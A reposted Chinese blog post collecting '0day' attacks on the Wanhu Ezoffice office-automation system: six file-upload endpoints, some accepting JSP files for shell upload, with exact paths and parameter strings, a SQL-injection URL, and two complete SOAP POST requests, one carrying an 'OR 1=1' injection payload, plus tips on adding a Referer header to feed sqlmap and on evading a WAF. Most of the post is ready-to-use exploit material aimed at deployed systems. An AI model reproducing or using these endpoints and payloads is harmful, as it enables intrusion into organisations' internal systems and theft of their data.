万户Ezoffice 漏洞集合+0day

栏目: JSP · 发布时间: 7年前

内容简介：万户Ezoffice 漏洞集合+0day

老版本任意文件上传、Web Service SQLi、New Web Serivce SQLi

一、老版本的用户已经不多了

1、第一处上传点

/defaultroot/govezoffice/gov_documentmanager/senddocument_import.jsp

构造参数上传，构造fileType=jsp来完成上传。

利用第一处上传的表单，直接上传jsp文件；直接返回文件名，如图：（查看源代码）

文件在upload参数设置的“archives”： /defaultroot/upload/archives/

2、第二处上传点

/defaultroot/customize/formClassUpload.jsp

没有任何限制直接上传，上传后的文件名是原文件名。

存在 defaultroot/devform/customize/ 目录下查看源代码看文件名

3、第三处上传点(鸡肋)

/defaultroot/public/jsp/smartUploadPic.jsp

利用第三处的构造参数截断URL和上传的文件名#需服务器支持URL允许存在空字节！文件上传存在 /defaultroot/upload/archives/ 下

4、第四处上传点

/defaultroot/work_flow/jsFileUpload.jsp

后门！简直就是后门，只能上传jsp文件！∑(O_O；)

文件上传在： /defaultroot/devform/workflow/ 原上传文件名。

5、第五处上传点

/defaultroot/extension/smartUpload.jsp?path=information&fileName=infoPicName&saveName=infoPicSaveName&tableName=infoPicTable&fileMaxSize=0&fileMaxNum=0&fileType=gif,jpg,bmp,jsp,png&fileMinWidth=0&fileMinHeight=0&fileMaxWidth=0&fileMaxHeight=0

文件位置 /defaultroot/upload/information/

6、第六处上传点

/defaultroot/public/jsp/multiuploadfile.jsp?path=sound&mode=add&fileName=fileName&saveName=soundSaveName&tableName=soundTableName&fileMaxSize=0&photos=null

文件位置： /defaultroot/upload/sound/

二、SQLi

/defaultroot/public/select_user/search_org_list.jsp?searchName=

三、老版本Web Service SQLi

/defaultroot/xfservices/DealFileWebService

POST包：

POST /defaultroot/xfservices/DealFileWebService HTTP/1.1
    Host: www.*..cn:7890
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Cookie: LocLan=zh_CN
    DNT: 1
    X-Forwarded-For: 8.8.8.8
    Connection: close
    Upgrade-Insecure-Requests: 1
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 567

<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"  xmlns:xsd="http://www.w3.org/1999/XMLSchema"  xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance"  xmlns:m0="http://tempuri.org/"  xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:urn="http://com.whir.mobile/DealFileWebService">     <SOAP-ENV:Header/>     <SOAP-ENV:Body>        <urn:getUserByAccount>           <urn:userAccount>1</urn:userAccount>        </urn:getUserByAccount>     </SOAP-ENV:Body></SOAP-ENV:Envelope>

四、New Web Service SQLi

老版本看到Web Service存在 SQL 注入后，想着去看看最新的版本。但是访问 xfservices 直接跳转首页，找不到Web Serivce了。

就去找了一下开发手册看看，你猜怎么着~๑乛◡乛๑

在Web Service Editor手工测试的时候，测试出来了存在SQL注入。

后来在抓包的时候遇到了坑，无法通过浏览器和burp直接抓包。(╯—﹏—)╯（┷━━━┷ 无法抓包，怎么愉快的丢SQLmap?

就去看了看漏洞库关于web service的注入漏洞，看到了几个例子需要中转脚本?(⊙⊙?)

怎么办,我不会写中转脚本。(╥╯^╰╥)

然后通过AWVS的HTTP Editor功能才知道，原来是有Referfer验证。所以加入Referfer就可以抓POST包丢SQLMAP了~

之前wooyun的需要中转脚本的Web Service 注入同理。

POST包：

POST /defaultroot/services/ExchangeService HTTP/1.1
Content-Type: text/xml
SOAPAction: ""
Content-Length: 788
X-Requested-With: XMLHttpRequest
Referer: http://oa.*.*.cn:7001/defaultroot/services/ExchangeService?wsdl
Host: oa.*.*.cn:7001
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"  xmlns:xsd="http://www.w3.org/1999/XMLSchema"  xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance"  xmlns:m0="http://tempuri.org/"  xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:urn="http://61.187.198.50:82/defaultroot/services/ExchangeService" xmlns:urn1="http://po.exchange.govezoffice.whir.com" xmlns:urn3="http://xml.apache.org/xml-soap">
     <SOAP-ENV:Header/>
     <SOAP-ENV:Body>
        <getExchangeUnitsByParameterAll>
         <unitLevel>1</unitLevel>
         <unitAccount>1' OR 1=1 -- </unitAccount>
         <orderBy>1</orderBy>
        </getExchangeUnitsByParameterAll>
     </SOAP-ENV:Body>
</SOAP-ENV:Envelope>

结果你猜怎么着,出来的是延时注入,surprise!!!还无视waf....嗷呜～ヾ(*´∇`)ﾉ

万户Ezoffice 漏洞集合+0day

以上所述就是小编给大家介绍的《万户Ezoffice 漏洞集合+0day》，希望对大家有所帮助，如果大家有任何疑问请给我留言，小编会及时回复大家的。在此也非常感谢大家对码农网的支持！

查看所有标签

猜你喜欢:

本站部分资源来源于网络，本站转载出于传递更多信息之目的，版权归原作者或者来源机构所有，如转载稿涉及版权问题，请联系我们。

码农书籍

Python语言程序设计基础（第2版）

嵩天、礼欣、黄天羽 / 高等教育出版社 / 2017-2 / 39

本书提出了以理解和运用计算生态为目标的Python语言教学思想，不仅系统讲解了Python语言语法，同时介绍了从数据理解到图像处理的14个Python函数库，向初学Python语言的读者展示了全新的编程语言学习路径。全书一共设计了25个非常具有现代感的实例，从绘制蟒蛇、理解天天向上的力量到机器学习、网络爬虫，从文本进度条、统计名著人物重要性到图像手绘效果、雷达图绘制，绝大多数实例为作者原创......一起来看看《Python语言程序设计基础（第2版）》这本书的介绍吧!

码农工具

CSS 压缩/解压工具

在线压缩/解压 CSS 代码

JSON 在线解析

在线 JSON 格式化工具